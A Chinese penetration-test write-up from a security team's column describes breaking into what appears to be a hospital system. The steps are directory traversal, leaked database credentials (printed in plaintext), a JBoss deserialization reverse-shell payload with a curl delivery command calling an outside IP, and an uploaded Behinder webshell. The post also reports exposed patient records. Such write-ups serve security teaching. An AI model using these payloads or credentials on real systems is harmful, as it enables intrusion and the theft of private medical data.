专栏首页Gcow安全团队记一次渗透实战

记一次渗透实战

此时此刻,拿出我们拿出好兄弟burp来抓包,看下响应包

尝试枚举,看能不能碰到狗屎运

跑中国人名字典,无结果,表示今天运气不行啊

废话不多说继续!!!

常规操作 ,对目标目录进行删减 ,发现了目录遍历的漏洞

http://xxx.xx.xxx.xx:9002/xxxying/

尝试能不能获取有用的信息

随意点击,爆出路径,为后面上传webshell 做铺垫

之后发现了数据库的文件

发现了两个账号

http://xxx.xx.xxx.xx:9002/xxxxxx/tdb.20xxx129.sql

还发现了两个账号

对密码进行解密

admin/12345678

coolfd/shj811004

获得两个账号 ,尝试登陆

发现两个账号不可用 ,可能是另外一个系统的吧

继续搞呗

找到一个网站

http://www.xxxxxxx.cc/index.html

试试有没有后台

http://www.xxxxxxx.cc/admin/login.php#

http://www.xxxxx.com/

http://www.xxxxxxx.com/admin/login.php#

尝试登陆后台 ,发现coolfd账号可用

登陆后台了

尝试找上传点

上传多次无果

/mxxxxtor/atxxxxd/image/20xxx923/20140xxxx11623_39094.jpg

多处

没有写权限

多处上传失败

只能搞ip

对目标ip进行端口扫描

逐个访问,发现了jboss

http://xxx.xx.xxx.xx:9080/

想到jboss 反序列化漏洞

在网上找了反序列化的exp

将payload生成好了,直接使用

java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 182.92.*.* 7777

监听端口

curl http://xxx.xx.x.xx:9080/ixxxxx/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

向目标路径 /invoker/readonly

即可拿到目标的最高权限

找到网站路径

发现了PHPinfo探针

http://xxx.xx.xxx.xx:9002/phpinfo.php

好像无法使用下载命令

Curl wget

只能用打包好的工具上传webshell了

6哥工具执行好像乱码了

只好上传冰蝎木马上去

知道路径 直接上传

为了便于管理,上传一个webshell

在文件管理看到了数据库文件

发现了账号和密码

解密成功,后台登陆成功

看起来是医院的系统

个人病例信息大量泄露

http://xxx.xx.x.xx:9002/zhxxxxg/rxxpg/35735xxxxx80%94369773.jpg

部分报告单泄露

为了安全起见,将木马已经删除了

似乎存在域环境

可惜自己菜 ,未敢深入

到这里就结束了,授权项目,如有打码不规范,请勿私自渗透,违者后果自负

本文分享自微信公众号 - Gcow安全团队(Gcow666)

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2020-05-13

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 【工具使用】强大的红队武器Octopus“吊打”杀软

    Octopus是基于python3的开源项目,可进行操作的C2服务器,可以通过HTTP / S控制Octopus powershell代理。

    Gcow安全团队
  • Bayonet-一体化的资产管理系统

    Github地址:https://github.com/CTF-MissFeng/bayonet

    Gcow安全团队
  • VulnHub通关日记-Mr-Robot-1-Nmap提权获取Flag

    靶机介绍:根据演练,机器人先生。此VM具有隐藏在不同位置的三个Key。您的目标是找到全部三个。每个Key逐渐难以找到。该级别被认为是初学者-中级。 下载地址:h...

    Gcow安全团队
  • sqlmap注入分类

    注入分法不同,种类不同,来个简单的分类: 1.get型:sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=xxx”  2.pos...

    Angel_Kitty
  • 为 Android Studio 或者 Android 项目设置代理

    本文记录给 Android Studio 设置代理,并添加白名单。适用于 Jenkins 等 CI/CD 环境。有修改配置文件和命令行2种方式。

    他叫自己MR.张
  • 深入了解Infor Factory Track:8份帮助文档

    在www.inforxtreme.com搜索Factory Track,记录还不多,目前之后141条记录,大概50条都是Manual或者Solution,从历史...

    崔文远TroyCui
  • 【Elasticsearch学习】(一) Elasticsearch 索引的增,删,查操作

    可以通过 update-index-settings API 修改settings信息 完成对副本数量的修改。

    Java编程指南
  • 【DB笔试面试649】在Oracle中,分区表统计信息的更新机制是怎样的?

    ① 当某个分区的数据变化达到10%,自动收集统计信息任务运行时,Oracle会更新该分区的统计信息。

    小麦苗DBA宝典
  • 一文了解Docker

    1)客户端(client): 通过命令行与Docker的守护进程通信,类似于mysql的客户端工具

    终身幼稚园
  • Docker 系列四(自定义仓库).

        Docker hub 是 Docker 官方维护的一个公共仓库,大部分需求都可以通过在 Docker hub 中直接下载镜像来完成。接下来,来看一下怎么...

    JMCui

扫码关注云+社区

领取腾讯云代金券